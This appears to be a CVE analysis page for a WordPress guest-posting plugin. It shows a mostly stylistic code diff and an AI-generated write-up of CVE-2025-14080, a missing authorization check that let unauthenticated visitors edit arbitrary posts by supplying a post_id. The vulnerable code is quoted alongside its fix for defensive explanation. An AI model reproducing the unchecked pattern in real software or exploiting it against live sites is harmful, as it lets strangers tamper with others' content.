intval($form_details['basic']['post_author']);             }             //Lets check the post status of the post for edited post-            $post_status = (!empty( $post_id )) ? get_post_status( $post_id ) : $post_status;+            $post_status = (!empty($post_id)) ? get_post_status($post_id) : $post_status;             // Lets insert post into DB             $postarr = array(                 'ID' => $post_id,@@ -141,66 +158,66 @@              *              * @since 1.0.0              */-            $postarr = apply_filters( 'fpsml_insert_postdata', $postarr, $form_data, $form_row );-            $insert_update_post_id = wp_insert_post( $postarr );-            if ( !empty( $insert_update_post_id ) ) {+            $postarr = apply_filters('fpsml_insert_postdata', $postarr, $form_data, $form_row);+            $insert_update_post_id = wp_insert_post($postarr);+            if (!empty($insert_update_post_id)) {                   //Lets assign the post image to the post-                if ( isset( $form_data['post_image'] ) ) {-                    if ( !empty( $post_id ) && empty( $form_data['post_image'] ) ) {-                        delete_post_thumbnail( $post_id );+                if (isset($form_data['post_image'])) {+                    if (!empty($post_id) && empty($form_data['post_image'])) {+                        delete_post_thumbnail($post_id);                     } else {-                        set_post_thumbnail( $insert_update_post_id, intval( $form_data['post_image'] ) );+                        set_post_thumbnail($insert_update_post_id, intval($form_data['post_image']));                     }                 }                  //Lets assign post format-                if ( !empty( $form_details['basic']['post_format'] ) ) {-                    set_post_format( $insert_update_post_id, $form_details['basic']['post_format'] );+                if (!empty($form_details['basic']['post_format'])) {+                    set_post_format($insert_update_post_id, $form_details['basic']['post_format']);                 }                  // Lets assign taxonomy terms-                if ( !empty( $taxonomy_lists ) ) {+                if (!empty($taxonomy_lists)) { -                    foreach ( $taxonomy_lists as $taxonomy_key ) {+                    foreach ($taxonomy_lists as $taxonomy_key) {                         $taxonomy_settings = $form_details['form']['fields'][$taxonomy_key];                         // If taxonomy is enabled in the form-                        $taxonomy_array = explode( '|', $taxonomy_key );-                        $taxonomy_name = end( $taxonomy_array );-                        if ( !empty( $taxonomy_settings['show_on_form'] ) ) {-                            $form_data[$taxonomy_key] = (!empty( $form_data[$taxonomy_key] )) ? $form_data[$taxonomy_key] : '';-                            if ( is_array( $form_data[$taxonomy_key] ) ) {-                                $post_assign_terms = implode( ',', $form_data[$taxonomy_key] );+                        $taxonomy_array = explode('|', $taxonomy_key);+                        $taxonomy_name = end($taxonomy_array);+                        if (!empty($taxonomy_settings['show_on_form'])) {+                            $form_data[$taxonomy_key] = (!empty($form_data[$taxonomy_key])) ? $form_data[$taxonomy_key] : '';+                            if (is_array($form_data[$taxonomy_key])) {+                                $post_assign_terms = implode(',', $form_data[$taxonomy_key]);                             } else {                                 $post_assign_terms = $form_data[$taxonomy_key];                             }-                            wp_set_post_terms( $insert_update_post_id, $post_assign_terms, $taxonomy_name );+                            wp_set_post_terms($insert_update_post_id, $post_assign_terms, $taxonomy_name);                         }                          // If explicit auto assign of the terms is enabled-                        if ( !empty( $taxonomy_settings['auto_assign'] ) ) {-                            $auto_assign_terms = implode( ',', $taxonomy_settings['auto_assign'] );-                            wp_set_post_terms( $insert_update_post_id, $auto_assign_terms, $taxonomy_name, true );+                        if (!empty($taxonomy_settings['auto_assign'])) {+                            $auto_assign_terms = implode(',', $taxonomy_settings['auto_assign']);+                            wp_set_post_terms($insert_update_post_id, $auto_assign_terms, $taxonomy_name, true);                         }                     }                 }-                if ( !empty( $form_data['author_email'] ) && !empty( $form_details['form']['fields']['author_email']['show_on_form'] ) ) {-                    update_post_meta( $insert_update_post_id, 'fpsml_author_email', $form_data['author_email'] );+                if (!empty($form_data['author_email']) && !empty($form_details['form']['fields']['author_email']['show_on_form'])) {+                    update_post_meta($insert_update_post_id, 'fpsml_author_email', $form_data['author_email']);                 }-                if ( !empty( $form_data['author_name'] ) && !empty( $form_details['form']['fields']['author_name']['show_on_form'] ) ) {-                    update_post_meta( $insert_update_post_id, 'fpsml_author_name', $form_data['author_name'] );+                if (!empty($form_data['author_name']) && !empty($form_details['form']['fields']['author_name']['show_on_form'])) {+                    update_post_meta($insert_update_post_id, 'fpsml_author_name', $form_data['author_name']);                 }                 //Lets work on custom fields here-                if ( !empty( $custom_field_lists ) ) {-                    foreach ( $custom_field_lists as $custom_field_key ) {-                        $custom_field_value = (!empty( $form_data[$custom_field_key] )) ? $form_data[$custom_field_key] : '';+                if (!empty($custom_field_lists)) {+                    foreach ($custom_field_lists as $custom_field_key) {+                        $custom_field_value = (!empty($form_data[$custom_field_key])) ? $form_data[$custom_field_key] : '';                         $custom_field_settings = $form_details['form']['fields'][$custom_field_key];-                        $custom_field_array = explode( '|', $custom_field_key );-                        $custom_field_meta_key = end( $custom_field_array );+                        $custom_field_array = explode('|', $custom_field_key);+                        $custom_field_meta_key = end($custom_field_array);                         $custom_field_type = $custom_field_settings['field_type'];-                        if ( $custom_field_type == 'datepicker' && !empty( $custom_field_settings['string_format'] ) ) {-                            $custom_field_value = strtotime( $custom_field_value );+                        if ($custom_field_type == 'datepicker' && !empty($custom_field_settings['string_format'])) {+                            $custom_field_value = strtotime($custom_field_value);                         }                         /**                          * Filters the custom field value before storing it in the database@@ -211,34 +228,34 @@                          *                          * @since 1.0.0                          */-                        $custom_field_value = apply_filters( 'fpsml_custom_field_value', $custom_field_value, $custom_field_key, $form_row );-                        update_post_meta( $insert_update_post_id, $custom_field_meta_key, $custom_field_value );+                        $custom_field_value = apply_filters('fpsml_custom_field_value', $custom_field_value, $custom_field_key, $form_row);+                        update_post_meta($insert_update_post_id, $custom_field_meta_key, $custom_field_value);                     }                 }                 // Storing form alias for the reference-                update_post_meta( $insert_update_post_id, '_fpsml_form_alias', $form_alias );+                update_post_meta($insert_update_post_id, '_fpsml_form_alias', $form_alias);                 $response['status'] = 200;-                $response['message'] = (!empty( $form_details['basic']['form_success_message'] )) ? esc_html( $form_details['basic']['form_success_message'] ) : esc_html__( 'Form submission successful.', 'frontend-post-submission-manager-lite' );+                $response['message'] = (!empty($form_details['basic']['form_success_message'])) ? esc_html($form_details['basic']['form_success_message']) : esc_html__('Form submission successful.', 'frontend-post-submission-manager-lite');                 // If redirection is enabled for post submission-                if ( empty( $post_id ) ) {-                    if ( !empty( $form_details['basic']['redirection'] ) ) {-                        if ( $form_details['basic']['redirection_type'] == 'url' ) {-                            if ( !empty( $form_details['basic']['redirection_url'] ) ) {-                                $response['redirect_url'] = esc_url( $form_details['basic']['redirection_url'] );+                if (empty($post_id)) {+                    if (!empty($form_details['basic']['redirection'])) {+                        if ($form_details['basic']['redirection_type'] == 'url') {+                            if (!empty($form_details['basic']['redirection_url'])) {+                                $response['redirect_url'] = esc_url($form_details['basic']['redirection_url']);                             }                         } else {-                            $post_url = get_the_permalink( $insert_update_post_id );+                            $post_url = get_the_permalink($insert_update_post_id);                             $response['redirect_url'] = $post_url;                         }                     }                 } else {-                    if ( !empty( $form_details['basic']['edit_redirection'] ) ) {-                        if ( !empty( $form_details['basic']['edit_redirection_url'] ) ) {-                            $response['redirect_url'] = esc_url( $form_details['basic']['edit_redirection_url'] );+                    if (!empty($form_details['basic']['edit_redirection'])) {+                        if (!empty($form_details['basic']['edit_redirection_url'])) {+                            $response['redirect_url'] = esc_url($form_details['basic']['edit_redirection_url']);                         }                     }                 }-                $action = (empty( $post_id )) ? 'insert' : 'update';+                $action = (empty($post_id)) ? 'insert' : 'update';                 /**                  * Fires when the successful form submission is complete                  *@@ -246,15 +263,15 @@                  * @param array $form_row                  * @param string $action                  */-                do_action( 'fpsml_form_submission_success', $insert_update_post_id, $form_row, $action );+                do_action('fpsml_form_submission_success', $insert_update_post_id, $form_row, $action);             } else {                 $response['status'] = 403;-                $response['message'] = esc_html__( 'There occurred some error.', 'frontend-post-submission-manager-lite' );+                $response['message'] = esc_html__('There occurred some error.', 'frontend-post-submission-manager-lite');             }         }     } else {         $response['status'] = 403;-        $response['message'] = esc_html__( 'Invalid form submission', 'frontend-post-submission-manager-lite' );+        $response['message'] = esc_html__('Invalid form submission', 'frontend-post-submission-manager-lite');     }     /**      * Filters the form process response array@@ -265,9 +282,9 @@      *      * @since 1.0.0      */-    $response = apply_filters( 'fpsml_form_response', $response, $form_data, $form_row );-    echo json_encode( $response );+    $response = apply_filters('fpsml_form_response', $response, $form_data, $form_row);+    echo json_encode($response);     die(); } else {     $this->permission_denied();-}\ No newline at end of file+}

AI Analysis

Vulnerability Existed: yes
TRUE POSITIVE
Insecure Direct Object Reference (IDOR) / Broken Access Control - CWE-639 - includes/cores/ajax-process-form.php Lines 103-115

Old Code:
```php
$post_id = (!empty( $form_data['post_id'] )) ? intval( $form_data['post_id'] ) : 0;
$post_title = (!empty( $form_data['post_title'] )) ? $form_data['post_title'] : '';
$post_content = (!empty( $form_data['post_content'] )) ? $form_data['post_content'] : '';
```

Fixed Code:
```php
if (is_user_logged_in()) {
    $post_id = (!empty($form_data['post_id'])) ? intval($form_data['post_id']) : 0;
    if (!empty($post_id)) {
        if (!current_user_can('edit_post', $post_id)) {
            $response['status'] = 403;
            $response['message'] = esc_html__('Unauthorized', 'frontend-post-submission-manager-lite');
            die(json_encode($response));
        }
    }
} else {
    if (!empty($form_data['post_id'])) {
        $response['status'] = 403;
        $response['message'] = esc_html__('Unauthorized', 'frontend-post-submission-manager-lite');
        die(json_encode($response));
    }
}
```

Explanation:
The original code allowed any user to submit form data with an arbitrary `post_id` to edit or create posts without verifying they had permission to edit that specific post. This is a classic Insecure Direct Object Reference vulnerability. The fix adds proper authorization checks: (1) verifies the user is logged in, (2) if a post_id is provided, checks that the current user has the 'edit_post' capability for that specific post using `current_user_can('edit_post', $post_id)`, and (3) rejects unauthenticated attempts to edit posts. This prevents unauthorized users from modifying other users' posts.

CVE Analysis Results:

CVE-2025-14080: Yes

View CVE Description

The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.5. This is due to missing authorization checks on the post update functionality in the fpsml_form_process AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary posts by providing a post_id parameter via the guest posting form, allowing them to change post titles, content, excerpts, and remove post authors.

Analysis Report Folder Analysis cache/frontend-post-submission-manager-lite_1.2.5 → cache/frontend-post-submission-manager-lite_1.2.6 - CVE-2025-14080

Share this analysis

CVE Security Analysis & Writeups

AI Analysis

CVE Analysis Results:

AI Analysis

CVE Analysis Results:

AI Analysis

CVE Analysis Results: